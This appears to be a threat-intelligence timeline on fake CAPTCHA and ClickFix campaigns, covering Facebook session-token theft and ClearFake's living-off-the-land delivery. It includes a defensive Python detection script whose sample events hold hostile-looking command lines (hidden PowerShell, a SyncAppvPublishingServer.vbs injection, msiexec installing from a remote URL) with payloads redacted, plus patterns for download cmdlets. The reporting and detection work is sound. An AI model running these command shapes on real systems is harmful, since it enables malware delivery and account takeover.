Fake CAPTCHA/ClickFix Social Engineering Used to Deliver Malware and Steal Sessions
Threat actors are increasingly using fake CAPTCHA / verification pages as a scalable social-engineering lure to deliver malware and steal credentials by abusing users’ trust in routine web security checks. Censys research documented a large, fragmented ecosystem of lookalike fake CAPTCHA pages hosted across ~9,494 compromised sites and malicious properties, where roughly 70% of observed pages share near-identical visuals while delivering dozens of distinct payload variants via different execution models, including clipboard-driven instructions that lead victims to run PowerShell or VBScript downloaders.
Separately, a ClickFix campaign targeting Facebook users—especially content creators and businesses seeking verification—uses fake “verification” portals to trick victims into manually extracting and submitting browser session tokens (notably c_user and xs) via developer tools, enabling account takeover without exploiting software vulnerabilities. In parallel, the ClearFake campaign (a malicious JavaScript framework injected into hacked websites) has adopted ClickFix-style fake CAPTCHA lures and added more evasive “living off the land” behavior, including proxy execution to run PowerShell through trusted Windows features and shifting distribution to a popular CDN, reducing the effectiveness of defenses that rely primarily on blocking known-bad domains/IPs.

How this story unfolded
6 events from the most recent confirmed update back to the earliest known activity.
Censys identifies large fake CAPTCHA ecosystem across 9,494 sites
Censys analysts reported a broad fake verification ecosystem spanning about 9,494 compromised websites and malicious properties, with roughly 70% sharing nearly identical fake CAPTCHA pages. They identified at least 32 payload variants, including clipboard-driven PowerShell or VBScript execution, MSI delivery via msiexec, and fileless push-notification abuse through Matrix Push C2.
Cyber Security News reports ClickFix Facebook hijacking campaign
Cyber Security News reported on the widespread ClickFix campaign stealing Facebook accounts through fake verification pages and manual session-token theft. The coverage highlighted urgency tactics, instructional videos, and the instruction for victims not to log out for 24 hours so stolen cookies remain valid.
Expel documents ClearFake's updated fake-CAPTCHA delivery chain
Expel published technical details on ClearFake's large-scale campaign, describing compromised websites that inject fake CAPTCHA prompts and use ClickFix-style clipboard lures to make users run malware. The report also noted anti-analysis checks, smart-contract-based payload retrieval, and a UUID tracking mechanism to avoid reinfection and record infections.
ClearFake adopts more evasive LOTL proxy execution techniques
The ClearFake fake-CAPTCHA malware campaign recently shifted to a more evasive execution chain that abuses SyncAppvPublishingServer.vbs to launch hidden PowerShell through command injection. It also moved payload hosting to the legitimate jsDelivr CDN while continuing to retrieve JavaScript stages from BNB Smart Chain testnet smart contracts.
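The execution patterns described in this timeline (clipboard-pasted PowerShell launched from the Windows shell, msiexec pulling an installer from a URL, and the SyncAppvPublishingServer.vbs proxy-execution chain) all leave a recognisable trace in process-creation telemetry. The following is an added detection example written for this page; it is not code from Censys, Expel, or any of the campaigns, and the Sysmon-style events it scans are constructed samples with the attacker command lines replaced by placeholders. Field names, rule names and the `example.invalid` host are assumptions.

```python
"""Detection logic for the ClickFix / ClearFake execution patterns above.

Runs over constructed Sysmon-style process-creation events (constructed
sample data, not telemetry from any real host). Each rule maps to one of
the execution models the campaigns are reported to use.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line as logged


# Constructed sample events; attacker payloads are replaced with placeholders.
SAMPLE_EVENTS = [
    # 1. ClickFix: victim pastes a clipboard command into the Run dialog,
    #    so explorer.exe becomes the parent of a hidden PowerShell.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "<REDACTED CLIPBOARD PAYLOAD>"'),
    # 2. ClearFake LOTL chain: the Microsoft-signed script is handed an
    #    argument containing a ';' so it ends up running attacker PowerShell.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" "n; <REDACTED PS COMMAND>"'),
    # 3. MSI delivery: msiexec told to install straight from a remote URL.
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i https://cdn.example.invalid/update.msi /qn"),
    # 4. Benign: an admin runs a local script from a shell shortcut.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
    # 5. Benign: a local MSI installed by the installer service.
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Temp\app.msi /qn"),
]

SYNCAPPV = "syncappvpublishingserver.vbs"
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Parents that should not normally spawn hidden / downloading PowerShell:
# the shell (Run dialog, ClickFix) and the script hosts (proxy execution).
SUSPICIOUS_PARENTS = {"explorer.exe"} | SCRIPT_HOSTS
# Tokens typical of pasted one-liners: hidden window, download / eval cmdlets.
PS_SUSPICIOUS = re.compile(
    r"-w(indowstyle)?\s+hidden|downloadstring|invoke-webrequest|\biwr\b|"
    r"\birm\b|invoke-restmethod|\biex\b|invoke-expression"
)
MSI_REMOTE = re.compile(r"[/-]i\s+https?://")


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def detect(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches (empty if clean)."""
    findings = []
    cmd = ev.command_line.lower()
    parent, image = _basename(ev.parent_image), _basename(ev.image)

    # Rule 1: SyncAppvPublishingServer.vbs invoked by a script host with an
    # argument containing ';' (the injection primitive the LOTL chain relies on).
    if image in SCRIPT_HOSTS and SYNCAPPV in cmd and ";" in cmd.split(SYNCAPPV, 1)[1]:
        findings.append("lolbas-syncappv-injection")

    # Rule 2: PowerShell spawned by the shell or a script host with
    # hidden-window / download / eval tokens on its command line.
    if image in POWERSHELL and parent in SUSPICIOUS_PARENTS and PS_SUSPICIOUS.search(cmd):
        findings.append("suspicious-powershell-parent")

    # Rule 3: msiexec installing a package directly from a URL.
    if image == "msiexec.exe" and MSI_REMOTE.search(cmd):
        findings.append("msiexec-remote-install")

    return findings


def scan(events: list[ProcEvent]) -> list[list[str]]:
    """Apply detect() to every event; result index i corresponds to events[i]."""
    return [detect(ev) for ev in events]


if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(f"{_basename(ev.image):15} <- {_basename(ev.parent_image):13} {hits or 'clean'}")
```

The rules deliberately key on parent/child relationships and argument shape rather than on hosting domains, which is the point the Expel report makes: once payloads move to a popular CDN and a signed Windows script does the launching, domain blocklists see nothing, but a script host handing `SyncAppvPublishingServer.vbs` a `;`-bearing argument or `explorer.exe` parenting a hidden PowerShell is still anomalous on an ordinary workstation. Rule 2 will need tuning for environments where users legitimately run download cmdlets from a shell shortcut.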
ClickFix campaign expands with resilient token-theft infrastructure
From early 2025, the Facebook-focused ClickFix operation grew significantly and adopted distributed hosting and collection services such as Netlify, Vercel, Wasmer, GitHub Pages, Surge, Formspark, and submit-form.com. The workflow validated stolen c_user and xs tokens in real time and escalated to collecting recovery codes or passwords when token reuse failed.
ClickFix Facebook session hijacking campaign begins
A social-engineering campaign later dubbed ClickFix began operating in January 2025, targeting Facebook content creators, monetized pages, and businesses. The attackers used fake Facebook verification and account-review pages to trick victims into extracting and submitting their own session cookies.
Sources
Fake Captcha Ecosystem Exploits Trusted Web Infrastructure to Deliver Malware (cybersecuritynews.com)
New ClickFix Campaign Hijacks Facebook Sessions Using Fake Verification Pages (cybersecuritynews.com)
ClearFake gets more evasive with new living off the land (LOTL) techniques (expel.com)